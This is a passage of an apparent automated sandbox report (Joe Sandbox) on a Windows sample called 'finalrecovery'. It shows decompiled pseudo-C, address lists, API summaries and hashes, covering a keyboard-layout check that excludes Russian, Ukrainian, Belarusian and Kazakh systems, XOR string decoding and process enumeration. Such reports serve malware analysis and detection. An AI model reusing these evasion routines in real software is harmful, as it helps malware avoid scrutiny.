											goto L61;
											L39:
											_t222 = _v88;
											_t269 = _t269 + 0x1c;
											_t281 = _v96;
											__eflags = _t269 - _v92;
										} while (_t269 != _v92);
										_t269 = _v52;
										goto L41;
									}
								} else {
									goto L10;
								}
							}
						}
						goto L61;
						L11:
						_t267 = _t267 + 1;
					} while (_t267 < _v1568);
					goto L12;
				}
				L61:
			}

0x00404d40
0x00404d41
0x00404d49
0x00404d50
0x00404d54
0x00404d56
0x00404d58
0x00404d63
0x00404d64
0x00404d65
0x00404d6b
0x00404d70
0x00404d72
0x00404d77
0x00404d7b
0x00404d81
0x00404d83
0x00404d89
0x00404d8f
0x00404d92
0x00404d9c
0x00404da0
0x00404da7
0x00404dad
0x00404db4
0x00404dc1
0x00404dce
0x00404dd8
0x00404dde
0x00404de0
0x00404de8
0x00404efa
0x00404eff
0x00404f07
0x00404f08
0x00404f19
0x00404df0
0x00404df0
0x00404df0
0x00404e07
0x00404e0d
0x00404e13
0x00404e19
0x00404e23
0x00404e2d
0x00404e30
0x00404e3a
0x00404e41
0x00404e41
0x00404e43
0x00404e44
0x00404e58
0x00404e5d
0x00404e63
0x00404e69
0x00404e70
0x00404e76
0x00404eaa
0x00404eab
0x00404eae
0x00404eb3
0x00404e78
0x00404e78
0x00404e7f
0x00404e84
0x00404e8b
0x00404e8e
0x00404e96
0x00404e9b
0x00404e9e
0x00404e9e
0x00404eb9
0x00404ec0
0x00000000
0x00404ec2
0x00404ec2
0x00404ec8
0x00404ec9
0x00404ed1
0x00404ee3
0x00404ee3
0x00404ee5
0x00404eea
0x00000000
0x00404ed3
0x00404ed3
0x00404ed6
0x00404ee1
0x00404f1a
0x00404f1f
0x00404f20
0x00404f21
0x00404f23
0x00404f25
0x00404f30
0x00404f31
0x00404f34
0x00404f39
0x00404f3b
0x00404f3e
0x00404f3f
0x00404f40
0x00404f41
0x00404f45
0x00404f4b
0x00404f4d
0x00404f50
0x00404f53
0x00404f56
0x00404f5b
0x00404f5e
0x00404f63
0x00404f66
0x00404f69
0x00404f6c
0x00404f6f
0x00404f71
0x00405185
0x00405185
0x00405185
0x00000000
0x00404f77
0x00404f7d
0x00404f84
0x00404f8b
0x00404f8d
0x00404f90
0x00404f94
0x00404f9c
0x00404f9f
0x00404fa3
0x00404fa8
0x00404fae
0x00404fb5
0x00404fba
0x00404fbd
0x00404fc4
0x00404fc6
0x00404fc9
0x00404fce
0x00404fd6
0x00404fdb
0x00404fe8
0x00404fed
0x00404fed
0x00404fc4
0x00404ff0
0x00404ff5
0x00404ff7
0x00404ff9
0x00405000
0x00405007
0x0040500e
0x00405015
0x0040501c
0x00405023
0x0040502a
0x0040502a
0x0040502c
0x0040502c
0x00405031
0x00405036
0x0040503d
0x00405044
0x0040504b
0x0040504b
0x00405050
0x00405050
0x00405052
0x00405053
0x00405053
0x00405062
0x0040506a
0x00405070
0x00405079
0x0040507d
0x00405080
0x00405083
0x00405086
0x0040508b
0x0040508f
0x00405094
0x00405097
0x0040509a
0x004050c2
0x004050c2
0x0040509c
0x0040509c
0x004050a3
0x004050a8
0x004050b1
0x004050b6
0x004050b9
0x004050bd
0x004050c0
0x00000000
0x00000000
0x004050c0
0x004050c6
0x004050ca
0x004050cd
0x004050d0
0x00405100
0x00405100
0x00405104
0x004051e0
0x004051e0
0x004051e3
0x004051e6
0x0040520f
0x0040520f
0x00405212
0x00405187
0x00405187
0x00405189
0x00405226
0x0040522b
0x00405233
0x00405234
0x00405235
0x00405239
0x00405243
0x0040518f
0x00405192
0x00405195
0x004051a2
0x004051a5
0x004051ae
0x004051c1
0x004051c3
0x004051c6
0x004051cc
0x0040521c
0x0040521c
0x0040521e
0x00000000
0x004051ce
0x004051ce
0x004051d1
0x004051d9
0x004051dc
0x00405244
0x00000000
0x004051de
0x00000000
0x004051de
0x004051dc
0x004051cc
0x004051e8
0x004051e8
0x004051e8
0x004051eb
0x004051ed
0x004051f3
0x00405205
0x00405205
0x00405207
0x0040520c
0x00000000
0x004051f5
0x004051f5
0x004051f8
0x00405200
0x00405203
0x00000000
0x00000000
0x00000000
0x00000000
0x00405203
0x004051f3
0x0040510a
0x0040510a
0x0040510d
0x00405112
0x00000000
0x00405118
0x00405118
0x0040511d
0x00000000
0x00405123
0x00405123
0x00405128
0x00000000
0x0040512e
0x0040512e
0x00405133
0x00000000
0x00405139
0x00405139
0x0040513d
0x00405140
0x00405143
0x00000000
0x00405145
0x00405145
0x00405145
0x00405148
0x0040514a
0x00405150
0x00405166
0x00405166
0x00405168
0x0040516d
0x00000000
0x00405152
0x00405152
0x00405155
0x0040515d
0x00405160
0x00000000
0x00000000
0x00000000
0x00000000
0x00405160
0x00405150
0x00405143
0x00405133
0x00405128
0x0040511d
0x00405112
0x004050d2
0x004050d2
0x004050d2
0x004050d5
0x004050d7
0x004050dd
0x004050f3
0x004050f3
0x004050f5
0x004050fa
0x004050fd
0x00000000
0x004050df
0x004050df
0x004050e2
0x004050ea
0x004050ed
0x00405249
0x00405249
0x0040524e
0x0040524f
0x00405250
0x00405251
0x00405259
0x00405260
0x00405263
0x00405264
0x00405265
0x00405269
0x0040526f
0x00405275
0x0040527b
0x00405288
0x00405298
0x004052a0
0x004052b6
0x004052b8
0x004052ba
0x004052c5
0x004052cd
0x004052d3
0x004052d5
0x004052ea
0x004052ea
0x004052d5
0x004052f1
0x004052f7
0x004052fd
0x00405303
0x0040530a
0x0040530d
0x00405314
0x00405317
0x00405317
0x00405319
0x0040531a
0x0040531a
0x0040532a
0x00405334
0x00405335
0x00405337
0x00405340
0x00000000
0x00000000
0x00000000
0x004050ed
0x004050dd
0x00000000
0x00405170
0x00405170
0x00405173
0x00405176
0x00405179
0x00405179
0x00405182
0x00000000
0x00405182
0x00000000
0x00000000
0x00000000
0x00404ee1
0x00404ed1
0x00000000
0x00404eed
0x00404eed
0x00404eee
0x00000000
0x00404df0
0x00000000

APIs

GetKeyboardLayoutList.USER32(00000400,?,8E1B5714), ref: 00404DD8
GetLocaleInfoA.KERNELBASE(?,00000002,?,000001F4), ref: 00404E0D
__Init_thread_footer.LIBCMT ref: 00404FE8

Part of subcall function 0040EE7E: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F40,?,?,00450F44,00450F45), ref: 0040EE88
Part of subcall function 0040EE7E: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F40,?,?,00450F44,00450F45), ref: 0040EEBB
Part of subcall function 0040EE7E: RtlWakeAllConditionVariable.NTDLL ref: 0040EF32

Strings

GO@., xrefs: 00404F84
|[]], xrefs: 00404F7D
|[]]GO@., xrefs: 00404FC6

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterInfoInit_thread_footerKeyboardLayoutLeaveListLocaleVariableWake
String ID: GO@.$|[]]$|[]]GO@.
API String ID: 4140350330-2383573185
Opcode ID: 6892b5740da64c2b2d9348b309dd0dd1bfc46d41a66cecb01e4a995bbdcb44f0
Instruction ID: ad479d80e4ae435dd2ca2f0bd1958a9a33927952e9cdafdf44225e6c98ebece6
Opcode Fuzzy Hash: 6892b5740da64c2b2d9348b309dd0dd1bfc46d41a66cecb01e4a995bbdcb44f0
Instruction Fuzzy Hash: 4BE1D571D002598BDB14CF68CC857EEBBB1EF49314F14466AE405B72C2DB79AA84CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00404F20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00404F20(void* __ebx, void* __eflags) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v52;
				char _v68;
				char _v69;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				int _v108;
				signed int _v132;
				char _v272;
				char _v276;
				char _v280;
				char _v382;
				short _v384;
				int* _v400;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t86;
				signed int _t87;
				intOrPtr _t90;
				intOrPtr _t99;
				signed int _t105;
				short _t107;
				signed int _t112;
				signed int _t118;
				intOrPtr _t123;
				signed char _t124;
				signed char* _t125;
				void* _t130;
				int _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t137;
				intOrPtr _t138;
				intOrPtr _t139;
				int _t143;
				void* _t147;
				signed int _t155;
				int _t156;
				void* _t157;
				char* _t159;
				signed int _t169;
				intOrPtr* _t170;
				signed char _t176;
				long _t180;
				void* _t184;
				signed char* _t185;
				intOrPtr _t187;
				void* _t188;
				int* _t189;
				void* _t190;
				char _t191;
				void* _t192;
				intOrPtr _t193;
				void* _t195;
				void* _t196;
				intOrPtr _t197;
				signed int _t198;
				signed int _t199;
				void* _t200;
				void* _t201;
				signed int _t202;

				_push(0xffffffff);
				_push(0x42c535);
				_push( *[fs:0x0]);
				_t201 = _t200 - 0x5c;
				_t86 =  *0x43d054; // 0x8e1b5714
				_t87 = _t86 ^ _t198;
				_v20 = _t87;
				_push(__ebx);
				_push(_t191);
				_push(_t87);
				 *[fs:0x0] =  &_v16;
				_t155 = 0;
				_t159 =  &_v40;
				asm("xorps xmm0, xmm0");
				_v76 = 0;
				asm("movq [ebp-0x24], xmm0");
				_v32 = 0;
				E00404D40(0, _t159); // executed
				_v8 = 0;
				_t90 = _v36;
				_t187 = _v40;
				_v80 = _t90;
				if(_t187 == _t90) {
					L27:
					_t156 = 0;
					goto L28;
				} else {
					_v28 = 0x5d5d5b7c;
					_v24 = 0x2e404f47;
					_t197 =  *((intOrPtr*)( *[fs:0x2c]));
					_v84 = _t197;
					do {
						E0040BB10(_t155,  &_v68, _t180, _t187, _t187);
						_v44 =  *((intOrPtr*)(_t187 + 0x18));
						_v8 = 1;
						_t123 =  *0x450fe0; // 0x8000000f
						if(_t123 >  *((intOrPtr*)(_t197 + 4))) {
							E0040EEC8(_t123, 0x450fe0);
							_t201 = _t201 + 4;
							_t210 =  *0x450fe0 - 0xffffffff;
							if( *0x450fe0 == 0xffffffff) {
								_t18 =  &_v28; // 0x5d5d5b7c
								 *0x450d20 =  *_t18;
								_t19 =  &_v24; // 0x2e404f47
								 *0x450d24 =  *_t19;
								E0040F1DA( &_v68, _t210, 0x42ce60);
								E0040EE7E(0x450fe0);
								_t201 = _t201 + 8;
							}
						}
						_t124 =  *0x450d27; // 0x0
						if(_t124 != 0) {
							 *0x450d20 =  *0x450d20 ^ 0x0000002e;
							 *0x450d21 =  *0x450d21 ^ 0x0000002e;
							 *0x450d22 =  *0x450d22 ^ 0x0000002e;
							 *0x450d23 =  *0x450d23 ^ 0x0000002e;
							 *0x450d24 =  *0x450d24 ^ 0x0000002e;
							 *0x450d25 =  *0x450d25 ^ 0x0000002e;
							 *0x450d26 =  *0x450d26 ^ 0x0000002e;
							 *0x450d27 = _t124 ^ 0x0000002e;
						}
						_t125 = 0x450d20;
						_v108 = 0;
						_v92 = 0;
						_v88 = 0xf;
						_t23 =  &(_t125[1]); // 0x450d21
						_t185 = _t23;
						do {
							_t176 =  *_t125;
							_t125 =  &(_t125[1]);
						} while (_t176 != 0);
						E004026C0(_t155,  &_v108, 0x450d20, _t125 - _t185);
						_t191 = _v68;
						_t180 = _v52;
						_v76 = _t155 | 0x00000001;
						_t156 = _v108;
						_t129 =  >=  ? _t156 :  &_v108;
						_t159 =  >=  ? _t191 :  &_v68;
						_t130 = E004028A0(_t159, _t180, _t159,  >=  ? _t156 :  &_v108, _v92);
						_t201 = _t201 + 0xc;
						if(_t130 != 0xffffffff) {
							L11:
							_v69 = 1;
						} else {
							_t180 = _v52;
							_t159 =  >=  ? _t191 :  &_v68;
							_t147 = E004028A0(_t159, _t180, _t159, 0x439a6c, 7);
							_t201 = _t201 + 0xc;
							_v69 = 0;
							if(_t147 != 0xffffffff) {
								goto L11;
							}
						}
						_v76 = _v76 & 0xfffffffe;
						_t131 = _v88;
						if(_t131 < 0x10) {
							L16:
							if(_v69 != 0) {
								L32:
								_t132 = _v48;
								__eflags = _t132 - 0x10;
								if(_t132 < 0x10) {
									L36:
									_t187 = _v40;
									_t156 = 1;
									L28:
									if(_t187 == 0) {
										L38:
										 *[fs:0x0] = _v16;
										_pop(_t188);
										_pop(_t192);
										_pop(_t157);
										return E0040EB3F(_t156, _t157, _v20 ^ _t198, _t180, _t188, _t192);
									} else {
										_push(_t159);
										E0040D300(_t187, _v36, _t187, _t191);
										_t193 = _v40;
										_t202 = _t201 + 4;
										_t180 = (0x92492493 * (_v32 - _t193) >> 0x20) + _v32 - _t193 >> 4;
										_t99 = _t193;
										_t169 = ((_t180 >> 0x1f) + _t180) * 8 - (_t180 >> 0x1f) + _t180 << 2;
										if(_t169 < 0x1000) {
											L37:
											_push(_t169);
											E0040ED7F(_t193);
											goto L38;
										} else {
											_t193 =  *((intOrPtr*)(_t193 - 4));
											_t169 = _t169 + 0x23;
											if(_t99 - _t193 + 0xfffffffc > 0x1f) {
												E004134A7(_t156, _t180, __eflags);
												goto L40;
											} else {
												goto L37;
											}
										}
									}
								} else {
									_t65 = _t132 + 1; // 0x11
									_t159 = _t65;
									_t133 = _t191;
									__eflags = _t159 - 0x1000;
									if(_t159 < 0x1000) {
										L35:
										_push(_t159);
										E0040ED7F(_t191);
										_t201 = _t201 + 8;
										goto L36;
									} else {
										_t193 =  *((intOrPtr*)(_t191 - 4));
										_t169 = _t159 + 0x23;
										__eflags = _t133 - _t193 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L40;
										} else {
											goto L35;
										}
									}
								}
							} else {
								_t137 = _v44;
								if(_t137 == 0x419 || _t137 == 0x422 || _t137 == 0x423 || _t137 == 0x43f) {
									goto L32;
								} else {
									_v8 = 0;
									_t138 = _v48;
									if(_t138 < 0x10) {
										goto L25;
									} else {
										_t49 = _t138 + 1; // 0x11
										_t159 = _t49;
										_t139 = _t191;
										if(_t159 < 0x1000) {
											L24:
											_push(_t159);
											E0040ED7F(_t191);
											_t201 = _t201 + 8;
											goto L25;
										} else {
											_t193 =  *((intOrPtr*)(_t191 - 4));
											_t169 = _t159 + 0x23;
											if(_t139 - _t193 + 0xfffffffc > 0x1f) {
												goto L40;
											} else {
												goto L24;
											}
										}
									}
								}
							}
						} else {
							_t42 = _t131 + 1; // 0x11
							_t159 = _t42;
							_t143 = _t156;
							if(_t159 < 0x1000) {
								L15:
								_push(_t159);
								E0040ED7F(_t156);
								_t191 = _v68;
								_t201 = _t201 + 8;
								goto L16;
							} else {
								_t156 =  *(_t156 - 4);
								_t169 = _t159 + 0x23;
								if(_t143 - _t156 + 0xfffffffc > 0x1f) {
									L40:
									E004134A7(_t156, _t180, __eflags);
									asm("int3");
									asm("int3");
									_push(_t198);
									_t199 = _t202;
									_t105 =  *0x43d054; // 0x8e1b5714
									_v132 = _t105 ^ _t199;
									_push(_t193);
									_push(_t187);
									_t189 = _t169;
									_v400 = _t189;
									_v400 = _t189;
									_t107 =  *0x439a7c; // 0x3e
									asm("movq xmm0, [0x439a74]");
									_v384 = _t107;
									asm("movq [ebp-0x108], xmm0");
									E00410A80(_t189,  &_v382, 0, 0xfa);
									_t195 = OpenProcess(0x410, 0, _t180);
									__eflags = _t195;
									if(_t195 != 0) {
										_t118 =  &_v280;
										__imp__K32EnumProcessModules(_t195, _t118, 4,  &_v276); // executed
										__eflags = _t118;
										if(_t118 != 0) {
											__imp__K32GetModuleBaseNameA(_t195, _v280,  &_v272, 0x104); // executed
										}
									}
									FindCloseChangeNotification(_t195); // executed
									_t170 =  &_v272;
									 *_t189 = 0;
									_t189[4] = 0;
									_t184 = _t170 + 1;
									_t189[5] = 0xf;
									 *_t189 = 0;
									do {
										_t112 =  *_t170;
										_t170 = _t170 + 1;
										__eflags = _t112;
									} while (_t112 != 0);
									E004026C0(_t156, _t189,  &_v272, _t170 - _t184);
									_pop(_t190);
									__eflags = _v12 ^ _t199;
									_pop(_t196);
									return E0040EB3F(_t189, _t156, _v12 ^ _t199, _t184, _t190, _t196);
								} else {
									goto L15;
								}
							}
						}
						goto L47;
						L25:
						_t155 = _v76;
						_t187 = _t187 + 0x1c;
						_t197 = _v84;
					} while (_t187 != _v80);
					_t187 = _v40;
					goto L27;
				}
				L47:
			}

0x00404f23
0x00404f25
0x00404f30
0x00404f31
0x00404f34
0x00404f39
0x00404f3b
0x00404f3e
0x00404f3f
0x00404f41
0x00404f45
0x00404f4b
0x00404f4d
0x00404f50
0x00404f53
0x00404f56
0x00404f5b
0x00404f5e
0x00404f63
0x00404f66
0x00404f69
0x00404f6c
0x00404f71
0x00405185
0x00405185
0x00000000
0x00404f77
0x00404f7d
0x00404f84
0x00404f8b
0x00404f8d
0x00404f90
0x00404f94
0x00404f9c
0x00404f9f
0x00404fa3
0x00404fae
0x00404fb5
0x00404fba
0x00404fbd
0x00404fc4
0x00404fc6
0x00404fc9
0x00404fce
0x00404fd6
0x00404fdb
0x00404fe8
0x00404fed
0x00404fed
0x00404fc4
0x00404ff0
0x00404ff7
0x00404ff9
0x00405000
0x00405007
0x0040500e
0x00405015
0x0040501c
0x00405023
0x0040502c
0x0040502c
0x00405031
0x00405036
0x0040503d
0x00405044
0x0040504b
0x0040504b
0x00405050
0x00405050
0x00405052
0x00405053
0x00405062
0x0040506a
0x00405070
0x0040507d
0x00405080
0x00405083
0x0040508b
0x0040508f
0x00405094
0x0040509a
0x004050c2
0x004050c2
0x0040509c
0x004050a3
0x004050a8
0x004050b1
0x004050b6
0x004050b9
0x004050c0
0x00000000
0x00000000
0x004050c0
0x004050c6
0x004050ca
0x004050d0
0x00405100
0x00405104
0x004051e0
0x004051e0
0x004051e3
0x004051e6
0x0040520f
0x0040520f
0x00405212
0x00405187
0x00405189
0x00405226
0x0040522b
0x00405233
0x00405234
0x00405235
0x00405243
0x0040518f
0x00405192
0x00405195
0x004051a2
0x004051a5
0x004051ae
0x004051c1
0x004051c3
0x004051cc
0x0040521c
0x0040521c
0x0040521e
0x00000000
0x004051ce
0x004051ce
0x004051d1
0x004051dc
0x00405244
0x00000000
0x004051de
0x00000000
0x004051de
0x004051dc
0x004051cc
0x004051e8
0x004051e8
0x004051e8
0x004051eb
0x004051ed
0x004051f3
0x00405205
0x00405205
0x00405207
0x0040520c
0x00000000
0x004051f5
0x004051f5
0x004051f8
0x00405200
0x00405203
0x00000000
0x00000000
0x00000000
0x00000000
0x00405203
0x004051f3
0x0040510a
0x0040510a
0x00405112
0x00000000
0x00405139
0x00405139
0x0040513d
0x00405143
0x00000000
0x00405145
0x00405145
0x00405145
0x00405148
0x00405150
0x00405166
0x00405166
0x00405168
0x0040516d
0x00000000
0x00405152
0x00405152
0x00405155
0x00405160
0x00000000
0x00000000
0x00000000
0x00000000
0x00405160
0x00405150
0x00405143
0x00405112
0x004050d2
0x004050d2
0x004050d2
0x004050d5
0x004050dd
0x004050f3
0x004050f3
0x004050f5
0x004050fa
0x004050fd
0x00000000
0x004050df
0x004050df
0x004050e2
0x004050ed
0x00405249
0x00405249
0x0040524e
0x0040524f
0x00405250
0x00405251
0x00405259
0x00405260
0x00405263
0x00405264
0x00405265
0x00405269
0x0040526f
0x00405275
0x0040527b
0x00405288
0x00405298
0x004052a0
0x004052b6
0x004052b8
0x004052ba
0x004052c5
0x004052cd
0x004052d3
0x004052d5
0x004052ea
0x004052ea
0x004052d5
0x004052f1
0x004052f7
0x004052fd
0x00405303
0x0040530a
0x0040530d
0x00405314
0x00405317
0x00405317
0x00405319
0x0040531a
0x0040531a
0x0040532a
0x00405334
0x00405335
0x00405337
0x00405340
0x00000000
0x00000000
0x00000000
0x004050ed
0x004050dd
0x00000000
0x00405170
0x00405170
0x00405173
0x00405176
0x00405179
0x00405182
0x00000000
0x00405182
0x00000000

APIs

Part of subcall function 00404D40: GetKeyboardLayoutList.USER32(00000400,?,8E1B5714), ref: 00404DD8
Part of subcall function 00404D40: GetLocaleInfoA.KERNELBASE(?,00000002,?,000001F4), ref: 00404E0D

Part of subcall function 0040EEC8: EnterCriticalSection.KERNEL32(004504FC,00450D61,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EED3
Part of subcall function 0040EEC8: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EF10

__Init_thread_footer.LIBCMT ref: 00404FE8

Part of subcall function 0040EE7E: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F40,?,?,00450F44,00450F45), ref: 0040EE88
Part of subcall function 0040EE7E: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F40,?,?,00450F44,00450F45), ref: 0040EEBB
Part of subcall function 0040EE7E: RtlWakeAllConditionVariable.NTDLL ref: 0040EF32

Strings

GO@., xrefs: 00404F84
|[]], xrefs: 00404F7D
|[]]GO@., xrefs: 00404FC6

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInfoInit_thread_footerKeyboardLayoutListLocaleVariableWake
String ID: GO@.$|[]]$|[]]GO@.
API String ID: 960455753-2383573185
Opcode ID: 1439b6664eb94a7b13a85c8cb42a754c4416ec6dbb3fe98a0fb638915fd95088
Instruction ID: 98f94566ca8f805a31a8e8de89f1e0191cee1318bbd29161dd1297d57ac7a80e
Opcode Fuzzy Hash: 1439b6664eb94a7b13a85c8cb42a754c4416ec6dbb3fe98a0fb638915fd95088
Instruction Fuzzy Hash: 7181C675D002498BDB14DFA8D8857AFBBB0EF09314F54063AE401BB2D2D778A948CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405350 Relevance: 6.1, APIs: 4, Instructions: 80
processCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00405350(void* __ebx, int* _a4, long _a24) {
				signed int _v8;
				signed int _v12;
				char _v272;
				void* _v308;
				signed int _v340;
				int* _v604;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t25;
				int _t27;
				int* _t31;
				signed int _t36;
				signed int _t39;
				void* _t49;
				int _t51;
				void* _t53;
				void* _t54;
				int* _t57;
				intOrPtr* _t58;
				long _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				int* _t72;
				void* _t73;
				signed int _t74;
				signed int _t75;
				signed int _t76;

				_t23 =  *0x43d054; // 0x8e1b5714
				_v8 = _t23 ^ _t74;
				_push(__ebx);
				_push(_t65);
				_t25 = CreateToolhelp32Snapshot(0xf, 0); // executed
				_t70 = _t25;
				_v308 = 0x128;
				_t27 = Process32First(_t70,  &_v308); // executed
				if(_t27 == 0) {
					L4:
					FindCloseChangeNotification(_t70); // executed
					_t53 = 0;
				} else {
					_t65 = Process32Next;
					while(1) {
						_t47 =  >=  ? _a4 :  &_a4;
						_t49 = E00410160( &_v272,  >=  ? _a4 :  &_a4);
						_t76 = _t76 + 8;
						if(_t49 != 0) {
							break;
						}
						_t51 = Process32Next(_t70,  &_v308); // executed
						if(_t51 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L5;
					}
					_t53 = 1;
				}
				L5:
				_t63 = _a24;
				if(_t63 < 0x10) {
					L11:
					_pop(_t66);
					_pop(_t71);
					_pop(_t54);
					return E0040EB3F(_t53, _t54, _v8 ^ _t74, _t63, _t66, _t71);
				} else {
					_t57 = _a4;
					_t63 = _t63 + 1;
					_t31 = _t57;
					if(_t63 < 0x1000) {
						L10:
						_push(_t63);
						E0040ED7F(_t57);
						goto L11;
					} else {
						_t57 =  *(_t57 - 4);
						_t63 = _t63 + 0x23;
						if(_t31 - _t57 + 0xfffffffc > 0x1f) {
							E004134A7(_t53, _t63, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t74);
							_t75 = _t76;
							_t36 =  *0x43d054; // 0x8e1b5714
							_v340 = _t36 ^ _t75;
							_push(_t70);
							_push(_t65);
							_t72 = _t57;
							_v604 = _t72;
							_v604 = _t72;
							_t67 = OpenProcess(0x410, 0, _t63);
							__eflags = _t67;
							if(_t67 != 0) {
								__imp__K32GetModuleFileNameExA(_t67, 0,  &_v272, 0x104); // executed
								FindCloseChangeNotification(_t67); // executed
							}
							_t58 =  &_v272;
							 *_t72 = 0;
							_t72[4] = 0;
							_t64 = _t58 + 1;
							_t72[5] = 0xf;
							 *_t72 = 0;
							do {
								_t39 =  *_t58;
								_t58 = _t58 + 1;
								__eflags = _t39;
							} while (_t39 != 0);
							E004026C0(_t53, _t72,  &_v272, _t58 - _t64);
							_pop(_t68);
							__eflags = _v12 ^ _t75;
							_pop(_t73);
							return E0040EB3F(_t72, _t53, _v12 ^ _t75, _t64, _t68, _t73);
						} else {
							goto L10;
						}
					}
				}
			}

0x00405359
0x00405360
0x00405363
0x00405365
0x0040536a
0x00405370
0x00405372
0x00405384
0x0040538c
0x004053c1
0x004053c2
0x004053c8
0x0040538e
0x0040538e
0x00405394
0x0040539b
0x004053a7
0x004053ac
0x004053b1
0x00000000
0x00000000
0x004053bb
0x004053bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053bf
0x004053f2
0x004053f2
0x004053ca
0x004053ca
0x004053d0
0x00405400
0x00405405
0x00405406
0x00405409
0x00405412
0x004053d2
0x004053d2
0x004053d5
0x004053d6
0x004053de
0x004053f6
0x004053f6
0x004053f8
0x00000000
0x004053e0
0x004053e0
0x004053e3
0x004053ee
0x00405413
0x00405418
0x00405419
0x0040541a
0x0040541b
0x0040541c
0x0040541d
0x0040541e
0x0040541f
0x00405420
0x00405421
0x00405429
0x00405430
0x00405433
0x00405434
0x00405436
0x0040543a
0x00405445
0x00405451
0x00405453
0x00405455
0x00405466
0x0040546d
0x0040546d
0x00405473
0x00405479
0x0040547f
0x00405486
0x00405489
0x00405490
0x00405493
0x00405493
0x00405495
0x00405496
0x00405496
0x004054a6
0x004054b0
0x004054b1
0x004054b3
0x004054bc
0x004053f0
0x00000000
0x004053f0
0x004053ee
0x004053de

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0040536A
Process32First.KERNEL32(00000000,00000128), ref: 00405384
Process32Next.KERNEL32 ref: 004053BB
FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 004053C2

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 140a377091eb68baeb517e7600a9f45eb7aaf4f5201008fc12169e23d9615c6d
Instruction ID: 99d4fd4856a74736bfac33b555c65fcc50ced0e1ccdc43452efd62a6c83cc5c7
Opcode Fuzzy Hash: 140a377091eb68baeb517e7600a9f45eb7aaf4f5201008fc12169e23d9615c6d
Instruction Fuzzy Hash: A121F331600118ABDB20DF25DD45BEF37A8EB45345F50057AE805D6281E778DA82CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00417B2F Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00417B2F(int _a4) {
				void* _t14;

				if(E0042039F(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00417B71(_t14, _a4);
				ExitProcess(_a4);
			}

0x00417b3c
0x00417b58
0x00417b58
0x00417b61
0x00417b6a

APIs

GetCurrentProcess.KERNEL32(0041CB9F,?,00417B2E,00000000,?,0041CB9F,00000000,0041CB9F), ref: 00417B51
TerminateProcess.KERNEL32(00000000,?,00417B2E,00000000,?,0041CB9F,00000000,0041CB9F), ref: 00417B58
ExitProcess.KERNEL32 ref: 00417B6A

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ed8121747a5916c0d4d7e76e5998f8eb11bb96fe12b92581084defb0bd95f10c
Instruction ID: 823f1f8a5f953c157eb43a61dc777276b9c9f4f5bb5b3f464bbe2e79c16ce7d4
Opcode Fuzzy Hash: ed8121747a5916c0d4d7e76e5998f8eb11bb96fe12b92581084defb0bd95f10c
Instruction Fuzzy Hash: 6BE04631108148AFCB216F66DC09EA93B79FB44345B504429F8058A231CB3AEC93CA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F709 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F709() {
				_Unknown_base(*)()* _t1;

